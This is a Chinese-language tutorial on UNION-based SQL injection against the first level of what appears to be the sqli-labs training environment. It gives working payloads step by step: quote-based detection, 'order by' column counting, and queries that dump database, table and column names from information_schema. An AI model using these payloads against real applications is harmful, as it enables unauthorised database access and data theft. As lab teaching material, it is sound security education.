页面有显示位时 , 可用联合注入
本次以 SQLi 第一关为案例
参数中添加 单引号 ' , 如果报错,说明后端没有过滤参数 , 即 存在注入
?id=1'
从数据库的报错中我们可得知 , 最外边的一对单引号是错误提示自带的,我们不用管
我们输入的1 , 两边的一对单引号 , 是SQL拼接参数时使用的
而1 右边的单引号 , 是我们自己输入的
也就是说 , 后台SQL中拼接参数时 , 使用的是单引号 , 固 注入点为 单引号字符串型
order by 1 , 即 根据第1列排序 , 修改排序的列,如果存在该列,则会正常显示 , 如果不存在该列 则会报错 , 我们从第1列开始排序 , 然后是第2列,第3列
?id=1' order by 4-- a第4列时,开始报错,没有第四列 , 也就是说,返回的结果中只有3列, 固 3个字段
联合查询 可以将左右两个查询语句的结果合并在一起显示,左边的查询结果显示在上方,右边的查询结果显示在下方 , 前提是两个查询结果的字段数一致 , 如果字段数不一致则会报错 , 这也是我们上一步需要获取字段数的原因
我们输入id为-1 , 由于id没有负数,导致SQL左边的查询没有数据 , 最后的结果就只会显示右边的查询结果 , 也就是 1 2 3
?id=-1' union select 1,2,3 -- a
我们参数中 3 替换成查询语句 , 从而在页面 3 的位置上显示我们的查询结果
group_concat() , 可以将多行结果合并为一行
?id=-1' union select 1,2,
(select group_concat(schema_name) from information_schema.schemata)
-- a 我们可以看到 , 原本3的位置 展示了我们查询的数据 : 所有数据库
通过修改参数中 3 处的查询语句 , 可以显示不同的结果 如 所有表
?id=-1' union select 1,2,
(select group_concat(table_name)
from information_schema.tables
where table_schema='security')
-- a所有字段
?id=-1' union select 1,2,
(select group_concat(column_name)
from information_schema.columns
where table_schema='security' and table_name='users')
-- a拿到表和字段信息后 , 就可以任意查询数据库中的数据了